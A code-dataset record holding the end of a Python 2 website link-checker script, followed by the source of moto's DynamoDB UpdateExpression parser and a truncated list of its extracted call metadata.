print '#' * 79 print ' Link Checker Results\n' if not deadlinks: print '[+] CLEAN: No dead links found' else: for item in deadlinks: print '[-] NOT FOUND: %s' % item ####################################### # Main program # # Get command line options parser = argparse.ArgumentParser(description='A Python-based link checker.') parser.add_argument('-f','--format', required=False, default='txt', help='Output file format ') parser.add_argument('-l','--limit', required=False, default=2, help='Limit directory depth, example.com/limit/dir/depth/') parser.add_argument('-u','--url', help='Base URL to check', required=True) parser.add_argument('-o','--output', help='Output file name', required=False) args = parser.parse_args() # Assign program arguments to variables # - we may want to add a '/' to baseurl if it's not present. # - if the href links are relative we need to add the baseurl when checking # the link. baseurl = str(args.url) pathlimit = int(args.limit) # Show values print 'Base URL: %s' % args.url print 'Output file format: %s' % args.format print 'Output file: %s' % args.output print 'Limit spider: %d' % args.limit # Grab today's date for timestamping output file. now = datetime.now() tstamp = now.strftime("%Y%m%d-%H%M") # Grab all a href links checkurl = urllib2.urlopen(baseurl).read() soup = BeautifulSoup(checkurl, 'html.parser') # Spider the site and build our list of URLs to check spiderURL(baseurl, pathlimit) deadlinks = [] # This for loop will completely change once the spiderURL function is working. # We'll iterate over the various directory paths instead. outofscope = 0 # Check the URLs for link in soup("a"): # Fetch the link but only return the status code # hrefs are unpredicatable we can add a function to 'clean' them up, i.e., # get the proto, domain, path, file (TODO: for a complete solution we # need to get all of this) #if baseurl[:-1] == '/': # print '[debug] strip last char from baseurl' # mailto: is causing an error href = link.get('href') print '[debug] href: %s' % href if re.match('^mailto', href): # skip this one continue # Separate the file from the path thisurl = urlparse(href) if thisurl.netloc != baseurl and thisurl.netloc != '': print '[-] HREF %s is out of scope' % thisurl.netloc outofscope = 1 else: print '[debug] path %s' % thisurl.path outofscope = 0 # Build the full URL if the href is relative. # - assuming, for now, other protocols are not desired # - place this in the Spider function try: if re.match('^http', href): checkurl = href else: checkurl = baseurl + href except: print '[-] Unknown error in re.match()' try: #print '[+] checking %s' % checkurl hrefpage = urllib2.urlopen(checkurl) except urllib2.HTTPError as e: if e.code == 404: print '[-] 404 ERROR: %s' % checkurl # add this URL to deadlink list deadlinks.append(checkurl) else: print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl) except urllib2.URLError as e: # Not an HTTP-specific error (e.g. connection refused) print '[-] NON-HTTP ERROR: %d - %s' % (e.code, checkurl) else: print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl) printReport(deadlinks) # EOF
[]
orenmazor/moto
moto/dynamodb2/parsing/expressions.py
4778377e8ecaf729d26602a2c5202b72c1438503
import logging from abc import abstractmethod import abc import six from collections import deque from moto.dynamodb2.parsing.ast_nodes import ( UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause, ) from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer class NestableExpressionParserMixin(object): """ For nodes that can be nested in themselves (recursive). Take for example UpdateExpression's grammar: UpdateExpression => UpdateExpressionClause* UpdateExpression => UpdateExpressionClause* UpdateExpression If we consider it of structure NestableExpression => TargetClause* NestableExpression => TargetClause* NestableExpression This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern. This approach is taken since it allows to remain the ordering of the Nodes as how the corresponding tokens where in the originating expression. """ def __init__(self, *args, **kwargs): self.target_clauses = deque() def _parse_target_clause(self, factory_class): """ Args: factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser Returns: """ logging.debug( "Move token pos {pos} to continue parsing with specific factory class {fc}".format( pos=self.token_pos, fc=factory_class.__class__.__name__ ) ) # noinspection PyProtectedMember ast, token_pos = factory_class(**self._initializer_args())._parse_with_pos() self.target_clauses.append(ast) logging.debug( "Continue where previous parsing ended {token_pos}".format( token_pos=token_pos ) ) self.token_pos = token_pos @abstractmethod def _initializer_args(self): """ Get the arguments of the initializer. This is implemented by the calling class. See ExpressionParser for an example. Returns: dict: A dictionary of the initializer arguments """ @classmethod @abstractmethod def _nestable_class(cls): """ Get the class of the Node that will be created that would be nested. For the example in the docstring this would be UpdateExpression Returns: class: The class of the Nodes that will be created. """ def _create_node(self): """ target_clauses has the nodes in order of encountering. Go through them backwards and build the tree bottom up. This way left-deep-descending traversal will process nodes in order. Continuing the example of an UpdateExpression: For example SET a=3 REMOVE b UpdateExpression / \ SET a=3 UpdateExpression | REMOVE b self.target_clauses looks like: ( SET a=3 >> REMOVE b ) Returns: moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory. """ assert len(self.target_clauses) > 0, "No nodes for {cn}".format( cn=self.__class__.__name__ ) target_node = self._nestable_class()(children=[self.target_clauses.pop()]) while len(self.target_clauses) > 0: target_node = self._nestable_class()( children=[self.target_clauses.pop(), target_node] ) return target_node @six.add_metaclass(abc.ABCMeta) class ExpressionParser: """Abstract class""" def __init__(self, expression_token_list, token_pos=0): """ Args: expression_token_list: token_pos(int): Location where parsing is """ self.token_list = expression_token_list self.token_pos = token_pos def _initializer_args(self): return {"expression_token_list": self.token_list, "token_pos": self.token_pos} @abstractmethod def _parse(self): """ Start parsing the token_list from token_pos for the factory type. Returns: moto.dynamodb2.ast_nodes.Node: AST which is root node of resulting abstract syntax tree """ @classmethod def is_possible_start(cls, token): return token is not None and cls._is_possible_start(token) @classmethod @abstractmethod def _is_possible_start(cls, token): """ Args: token(moto.dynamodb2.tokens.Token): Returns: bool: True if token is a possible start for entries processed by `cls` """ def _parse_with_pos(self): """ Start parsing the token_list from token_pos for the factory type and also return the resulting token_pos. Returns: (ast, token_pos): tuple of AST which is root node of resulting abstract syntax tree and token_pos is the position in the tokenlist. """ return self._parse(), self.token_pos def parse(self): return self._parse() def get_next_token_type(self): """ Get the type of the next token to be processed Returns: str: Token type or None if no more next token """ try: return self.get_next_token().type except AttributeError: return None def get_next_token(self): """ Get the next token to be processed Returns: moto.dynamodb2.tokens.Token: or None if no more next token """ try: return self.token_list[self.token_pos] except IndexError: return None def get_next_token_value(self): """ Get the value of the next token to be processed Returns: str: value or None if no more next token """ try: return self.get_next_token().value except AttributeError: return None def is_at_end(self): """Return boolean indicating whether we are at end of the parsing""" return self.token_pos == len(self.token_list) def is_at_start(self): """Return boolean indicating whether we are at start of the parsing""" return self.token_pos == 0 def get_last_token_value(self): """Get the last token that was correctly parsed or return empty string""" if self.token_pos > 0: return self.token_list[self.token_pos - 1].value else: return "" def get_last_token_type(self): """Get the last token type that was correctly parsed or return None""" if self.token_pos > 0: return self.token_list[self.token_pos - 1].type else: return None def get_2nd_last_token_value_if_last_was_whitespace(self): """Get the 2nd last token that was correctly parsed if last one was whitespace or return empty string""" if self.token_pos > 1 and self.get_last_token_type() == Token.WHITESPACE: return self.token_list[self.token_pos - 2].value else: return "" def get_following_token_value(self): """Get the token value after the one that is being parsed or empty string if non existent.""" try: return self.token_list[self.token_pos + 1].value except IndexError: return "" def get_following_token_type(self): """Get the token type after the one that is being parsed or None if non existent.""" try: return self.token_list[self.token_pos + 1].type except IndexError: return None def get_2nd_following_token_value_if_following_was_whitespace(self): """Get the 2nd following token that was correctly parsed if 1st one was whitespace or return empty string""" if self.get_following_token_type() == Token.WHITESPACE: try: return self.token_list[self.token_pos + 2].value except IndexError: return "" else: return "" def skip_white_space(self): try: while self.get_next_token_type() == Token.WHITESPACE: self.token_pos += 1 except IndexError: assert self.token_pos > 0, "We should always have positive indexes" logging.debug("We are out of range so end is reached") def process_token_of_type(self, token_type): """ Maker sure the next token is of type `token_type` if not raise unexpected token Args: token_type: A token type Returns: str: The value if the token is of type `token_type` """ if self.get_next_token_type() == token_type: token_value = self.get_next_token_value() self.goto_next_significant_token() return token_value else: self.raise_unexpected_token() def goto_next_significant_token(self): """Continue past current token and skip all whitespaces""" self.token_pos += 1 self.skip_white_space() def raise_unexpected_token(self): if self.is_at_end(): problematic_token = "<EOF>" problematic_token_in_near = "" else: problematic_token_in_near = problematic_token = self.get_next_token_value() near = "".join( [ self.get_2nd_last_token_value_if_last_was_whitespace(), self.get_last_token_value(), problematic_token_in_near, self.get_following_token_value(), self.get_2nd_following_token_value_if_following_was_whitespace(), ] ) raise InvalidTokenException(problematic_token, near) class NestableBinExpressionParser(ExpressionParser): """ For nodes that can be nested in themselves (recursive) but with an operation. Take for example UpdateExpressionValue's grammar: Value => Operand* Value => Operand* + Value Value => Operand* - Value If we consider it of structure NestableBinExpression => TargetClause* NestableBinExpression => TargetClause* BinOp NestableBinExpression This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern. This approach is taken since it allows to remain the ordering of the Nodes as how the corresponding tokens where in the originating expression. """ def __init__(self, *args, **kwargs): super(NestableBinExpressionParser, self).__init__(*args, **kwargs) self.target_nodes = deque() def _parse_target_clause(self, factory_class): """ Args: factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser Returns: """ # noinspection PyProtectedMember ast, self.token_pos = factory_class( **self._initializer_args() )._parse_with_pos() self.target_nodes.append(ast) logging.debug( "Continue where previous parsing ended {token_pos}".format( token_pos=self.token_pos ) ) def _parse(self): self._parse_target_clause(self._operand_factory_class()) while self._binop_factory_class().is_possible_start(self.get_next_token()): self._parse_target_clause(self._binop_factory_class()) if self._operand_factory_class().is_possible_start(self.get_next_token()): self._parse_target_clause(self._operand_factory_class()) else: self.raise_unexpected_token() return self._create_node() @abstractmethod def _operand_factory_class(self): """ Get the Parser class of the Operands for the Binary operations/actions. Returns: class: """ @abstractmethod def _binop_factory_class(self): """ Get a factory that gets the possible binary operation. Returns: class: A class extending ExpressionParser """ def _create_node(self): """ target_clauses has the nodes in order of encountering. Go through them forward and build the tree bottom up. For simplicity docstring will use Operand Node rather than the specific node This way left-deep-descending traversal will process nodes in order. Continuing the example of an UpdateExpressionValue: For example value => a + :val - :val2 UpdateExpressionValue / | \ UpdateExpressionValue BinOp Operand / | | | | UpdateExpressionValue BinOp Operand - :val2 / | | Operand + :val | a self.target_nodes looks like: ( a >> + >> :val >> - >> :val2 ) Returns: moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory. """ if len(self.target_nodes) == 1: return UpdateExpressionValue(children=[self.target_nodes.popleft()]) else: target_node = UpdateExpressionValue( children=[ self.target_nodes.popleft(), self.target_nodes.popleft(), self.target_nodes.popleft(), ] ) while len(self.target_nodes) >= 2: target_node = UpdateExpressionValue( children=[ target_node, self.target_nodes.popleft(), self.target_nodes.popleft(), ] ) assert len(self.target_nodes) == 0 return target_node class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin): """ Parser to create update expressions """ @classmethod def _sub_factories(cls): return [ UpdateExpressionSetClauseParser, UpdateExpressionAddClauseParser, UpdateExpressionDeleteClauseParser, UpdateExpressionRemoveClauseParser, ] @classmethod def _is_possible_start(cls, token): pass def __init__(self, *args, **kwargs): super(UpdateExpressionParser, self).__init__(*args, **kwargs) NestableExpressionParserMixin.__init__(self) @classmethod def _nestable_class(cls): return UpdateExpression def _parse_expression_clause(self, factory_class): return self._parse_target_clause(factory_class) def _parse_by_a_subfactory(self): for sub_factory in self._sub_factories(): if sub_factory.is_possible_start(self.get_next_token()): self._parse_expression_clause(sub_factory) return True return False def _parse(self): """ Update Expression is the top-most node therefore it is expected to end up at the end of the expression. """ while True: self.skip_white_space() if self.is_at_end(): logging.debug("End reached") break elif self._parse_by_a_subfactory(): continue else: self.raise_unexpected_token() return self._create_node() @classmethod def make(cls, expression_str): token_list = ExpressionTokenizer.make_list(expression_str) return cls(token_list).parse() class UpdateExpressionSetClauseParser(ExpressionParser): """ UpdateExpressionSetClause => SET SetActions """ @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE and token.value.upper() == "SET" def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionSetActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionSetClause(children=[ast]) class UpdateExpressionActionsParser(ExpressionParser, NestableExpressionParserMixin): """ UpdateExpressionSetActions """ def __init__(self, *args, **kwargs): super(UpdateExpressionActionsParser, self).__init__(*args, **kwargs) NestableExpressionParserMixin.__init__(self) @classmethod def _is_possible_start(cls, token): raise RuntimeError( "{class_name} cannot be identified by the next token.".format( class_name=cls._nestable_class().__name__ ) ) @classmethod @abstractmethod def _nestable_class(cls): return UpdateExpressionSetActions @classmethod @abstractmethod def _nested_expression_parser_class(cls): """Returns the parser for the query part that creates the nested nodes""" def _parse(self): """ UpdateExpressionSetActions is inside the expression so it can be followed by others. Process SetActions one by one until no more SetAction. """ self.skip_white_space() while self._nested_expression_parser_class().is_possible_start( self.get_next_token() ): self._parse_target_clause(self._nested_expression_parser_class()) self.skip_white_space() if self.get_next_token_type() == Token.COMMA: self.goto_next_significant_token() else: break if len(self.target_clauses) == 0: logging.debug( "Didn't encounter a single {nc} in {nepc}.".format( nc=self._nestable_class().__name__, nepc=self._nested_expression_parser_class().__name__, ) ) self.raise_unexpected_token() return self._create_node() class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionSetActionParser @classmethod def _nestable_class(cls): return UpdateExpressionSetActions class UpdateExpressionSetActionParser(ExpressionParser): """ SetAction => Path = Value So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value. """ @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): """ UpdateExpressionSetActionParser only gets called when expecting a SetAction. So we should be aggressive on raising invalid Tokens. We can thus do the following: 1) Process path 2) skip whitespace if there are any 3) Process equal-sign token 4) skip whitespace if there are any 3) Process value """ path, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() self.process_token_of_type(Token.EQUAL_SIGN) self.skip_white_space() value, self.token_pos = UpdateExpressionValueParser( **self._initializer_args() )._parse_with_pos() return UpdateExpressionSetAction(children=[path, value]) class UpdateExpressionPathParser(ExpressionParser): """ Paths are selectors within items to specify a part within an Item. DynamoDB does not impose much restrictions on the data it stores but it does store more strict restrictions on how they are represented in UpdateExpression's. """ def __init__(self, *args, **kwargs): super(UpdateExpressionPathParser, self).__init__(*args, **kwargs) self.path_nodes = [] @classmethod def _is_possible_start(cls, token): """ Args: token(Token): the token to be checked Returns: bool: Whether the token could be the start of an UpdateExpressionPath """ if token.type == Token.ATTRIBUTE_NAME: return True elif token.type == Token.ATTRIBUTE and token.value.upper() != "REMOVE": """We have to make sure remove is not passed""" return True return False def _parse(self): return self.process_path() def process_path(self): self.parse_path() return UpdateExpressionPath(children=self.path_nodes) def parse_path(self): """ A path is comprised of: - Attribute: the name of an attribute as how it is stored which has no special characters - ATTRIBUTE_NAME: A placeholder that has no special characters except leading # to refer to attributes that have a name that is not allowed in an UpdateExpression) - DOT's: These are used to decent in a nested structure. When a DOT is in a path expression it is never part of an attribute name but always means to descent into a MAP. We will call each descend a patch chain - SELECTORs: E.g.: [1] These are used to select an element in ordered datatypes like a list. Whitespaces can be between all these elements that build a path. For SELECTORs it is also allowed to have whitespaces between brackets and numbers but the number cannot be split up with spaces Attributes and attribute_names must be separated with DOT's. Returns: UpdateExpressionPath: """ self.parse_path_chain() while self.is_next_token_start_of_patch_chain(): self.process_dot() self.parse_path_chain() def is_next_token_start_of_patch_chain(self): return self.get_next_token_type() == Token.DOT def process_dot(self): self.path_nodes.append(ExpressionPathDescender()) self.goto_next_significant_token() def parse_path_chain(self): self.process_attribute_identifying_token() self.skip_white_space() while self.is_next_token_start_of_selector(): self.process_selector() self.skip_white_space() def process_attribute_identifying_token(self): if self.get_next_token_type() == Token.ATTRIBUTE: self.path_nodes.append(ExpressionAttribute(self.get_next_token_value())) elif self.get_next_token_type() == Token.ATTRIBUTE_NAME: self.path_nodes.append(ExpressionAttributeName(self.get_next_token_value())) else: self.raise_unexpected_token() self.goto_next_significant_token() def is_next_token_start_of_selector(self): return self.get_next_token_type() == Token.OPEN_SQUARE_BRACKET def process_selector(self): """ Process the selector is only called when a selector must be processed. So do the following actions: - skip opening bracket - skip optional spaces - read numeric literal - skip optional spaces - pass closing bracket """ self.process_token_of_type(Token.OPEN_SQUARE_BRACKET) selector_value = self.process_token_of_type(Token.NUMBER) self.process_token_of_type(Token.CLOSE_SQUARE_BRACKET) self.path_nodes.append(ExpressionSelector(selector_value)) class UpdateExpressionValueParser(NestableBinExpressionParser): @classmethod def _is_possible_start(cls, token): return UpdateExpressionOperandParser.is_possible_start(token) def _operand_factory_class(self): return UpdateExpressionOperandParser def _binop_factory_class(self): return UpdateExpressionValueOperatorParser class UpdateExpressionGroupedValueParser(ExpressionParser): """ A grouped value is an Update Expression value clause that is surrounded by round brackets. Each Operand can be a grouped value by itself. """ def _parse(self): self.process_token_of_type(Token.OPEN_ROUND_BRACKET) value, self.token_pos = UpdateExpressionValueParser( **self._initializer_args() )._parse_with_pos() self.process_token_of_type(Token.CLOSE_ROUND_BRACKET) return UpdateExpressionGroupedValue(children=value) @classmethod def _is_possible_start(cls, token): return token.type == Token.OPEN_ROUND_BRACKET class UpdateExpressionValueOperatorParser(ExpressionParser): OPERATION_TOKENS = [Token.PLUS_SIGN, Token.MINUS_SIGN] @classmethod def _is_possible_start(cls, token): return token.type in cls.OPERATION_TOKENS def _parse(self): operation_value = self.get_next_token_value() assert operation_value in self.OPERATION_TOKENS self.goto_next_significant_token() return ExpressionValueOperator(operation_value) class UpdateExpressionOperandParser(ExpressionParser): """ Grammar Operand* => AttributeValue Operand* => UpdateExpressionFunction Operand* => Path Operand* => GroupedValue """ @classmethod def _sub_factories(cls): return [ UpdateExpressionAttributeValueParser, UpdateExpressionFunctionParser, UpdateExpressionPathParser, UpdateExpressionGroupedValueParser, ] @classmethod def _is_possible_start(cls, token): return any(parser.is_possible_start(token) for parser in cls._sub_factories()) def _parse(self): for factory in self._sub_factories(): if factory.is_possible_start(self.get_next_token()): node, self.token_pos = factory( **self._initializer_args() )._parse_with_pos() return node self.raise_unexpected_token() class UpdateExpressionAttributeValueParser(ExpressionParser): def _parse(self): attr_value = ExpressionAttributeValue( self.process_token_of_type(Token.ATTRIBUTE_VALUE) ) return attr_value @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE_VALUE class UpdateExpressionAttributeValueOrPathParser(ExpressionParser): def _parse(self): if UpdateExpressionAttributeValueParser.is_possible_start( self.get_next_token() ): token, self.token_pos = UpdateExpressionAttributeValueParser( **self._initializer_args() )._parse_with_pos() else: token, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() return token @classmethod def _is_possible_start(cls, token): return any( [ UpdateExpressionAttributeValueParser.is_possible_start(token), UpdateExpressionPathParser.is_possible_start(token), ] ) class UpdateExpressionFunctionParser(ExpressionParser): """ A helper to process a function of an Update Expression """ # Map function to the factories for its elements FUNCTIONS = { "if_not_exists": [ UpdateExpressionPathParser, UpdateExpressionAttributeValueOrPathParser, ], "list_append": [UpdateExpressionOperandParser, UpdateExpressionOperandParser], } @classmethod def _is_possible_start(cls, token): """ Check whether a token is supposed to be a function Args: token(Token): the token to check Returns: bool: True if token is the start of a function. """ if token.type == Token.ATTRIBUTE: return token.value in cls.FUNCTIONS.keys() else: return False def _parse(self): function_name = self.get_next_token_value() if function_name not in self.FUNCTIONS.keys(): # Function names are case sensitive raise InvalidUpdateExpression(function_name) self.goto_next_significant_token() self.process_token_of_type(Token.OPEN_ROUND_BRACKET) function_elements = [function_name] function_arguments = self.FUNCTIONS[function_name] for i, func_elem_factory in enumerate(function_arguments): func_elem, self.token_pos = func_elem_factory( **self._initializer_args() )._parse_with_pos() function_elements.append(func_elem) if i + 1 < len(function_arguments): self.skip_white_space() self.process_token_of_type(Token.COMMA) self.process_token_of_type(Token.CLOSE_ROUND_BRACKET) return UpdateExpressionFunction(children=function_elements) class UpdateExpressionRemoveClauseParser(ExpressionParser): """ UpdateExpressionRemoveClause => REMOVE RemoveActions """ def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionRemoveActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionRemoveClause(children=[ast]) @classmethod def _is_possible_start(cls, token): """REMOVE is not a keyword""" return token.type == Token.ATTRIBUTE and token.value.upper() == "REMOVE" class UpdateExpressionRemoveActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionRemoveActionParser @classmethod def _nestable_class(cls): return UpdateExpressionRemoveActions class UpdateExpressionRemoveActionParser(ExpressionParser): """ RemoveAction => Path = Value So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value. """ @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): """ UpdateExpressionRemoveActionParser only gets called when expecting a RemoveAction. So we should be aggressive on raising invalid Tokens. We can thus do the following: 1) Process path 2) skip whitespace if there are any """ path, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() return UpdateExpressionRemoveAction(children=[path]) class UpdateExpressionAddClauseParser(ExpressionParser): def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionAddActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionAddClause(children=[ast]) @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE and token.value.upper() == "ADD" class UpdateExpressionAddActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionAddActionParser @classmethod def _nestable_class(cls): return UpdateExpressionAddActions @six.add_metaclass(abc.ABCMeta) class UpdateExpressionPathValueParser(ExpressionParser): def _parse_path_and_value(self): """ UpdateExpressionAddActionParser only gets called when expecting an AddAction. So we should be aggressive on raising invalid Tokens. We can thus do the following: 1) Process path 2) skip whitespace if there are any 3) Process a value 4) skip whitespace if there are any Returns: [path, value]: A list containing the Path node and the AttributeValue nodes """ path, self.token_pos = UpdateExpressionPathParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() value, self.token_pos = UpdateExpressionAttributeValueParser( **self._initializer_args() )._parse_with_pos() self.skip_white_space() return [path, value] class UpdateExpressionAddActionParser(UpdateExpressionPathValueParser): @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): return UpdateExpressionAddAction(children=self._parse_path_and_value()) class UpdateExpressionDeleteClauseParser(ExpressionParser): def _parse(self): assert self.is_possible_start(self.get_next_token()) self.goto_next_significant_token() ast, self.token_pos = UpdateExpressionDeleteActionsParser( **self._initializer_args() )._parse_with_pos() # noinspection PyProtectedMember return UpdateExpressionDeleteClause(children=[ast]) @classmethod def _is_possible_start(cls, token): return token.type == Token.ATTRIBUTE and token.value.upper() == "DELETE" class UpdateExpressionDeleteActionsParser(UpdateExpressionActionsParser): """ UpdateExpressionSetActions """ @classmethod def _nested_expression_parser_class(cls): return UpdateExpressionDeleteActionParser @classmethod def _nestable_class(cls): return UpdateExpressionDeleteActions class UpdateExpressionDeleteActionParser(UpdateExpressionPathValueParser): @classmethod def _is_possible_start(cls, token): return UpdateExpressionPathParser.is_possible_start(token) def _parse(self): return UpdateExpressionDeleteAction(children=self._parse_path_and_value())
[((130, 1, 130, 31), 'six.add_metaclass', 'six.add_metaclass', ({(130, 19, 130, 30): 'abc.ABCMeta'}, {}), '(abc.ABCMeta)', False, 'import six\n'), ((971, 1, 971, 31), 'six.add_metaclass', 'six.add_metaclass', ({(971, 19, 971, 30): 'abc.ABCMeta'}, {}), '(abc.ABCMeta)', False, 'import six\n'), ((54, 30, 54, 37), 'collections.deque', 'deque', ({}, {}), '()', False, 'from collections import deque\n'), ((320, 14, 320, 60), 'moto.dynamodb2.exceptions.InvalidTokenException', 'InvalidTokenException', ({(320, 36, 320, 53): 'problematic_token', (320, 55, 320, 59): 'near'}, {}), '(problematic_token, near)', False, 'from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression\n'), ((344, 28, 344, 35), 'collections.deque', 'deque', ({}, {}), '()', False, 'from collections import deque\n'), ((493, 21, 493, 66), 'moto.dynamodb2.parsing.tokens.ExpressionTokenizer.make_list', 'ExpressionTokenizer.make_list', ({(493, 51, 493, 65): 'expression_str'}, {}), '(expression_str)', False, 'from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer\n'), ((513, 15, 513, 56), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionSetClause', 'UpdateExpressionSetClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((617, 15, 617, 64), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionSetAction', 'UpdateExpressionSetAction', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((652, 15, 652, 61), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionPath', 'UpdateExpressionPath', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((743, 15, 743, 59), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionGroupedValue', 'UpdateExpressionGroupedValue', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((761, 15, 761, 55), 'moto.dynamodb2.parsing.ast_nodes.ExpressionValueOperator', 'ExpressionValueOperator', ({(761, 39, 761, 54): 'operation_value'}, {}), '(operation_value)', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((879, 15, 879, 67), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionFunction', 'UpdateExpressionFunction', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((894, 15, 894, 59), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionRemoveClause', 'UpdateExpressionRemoveClause', (), '', False, 'from 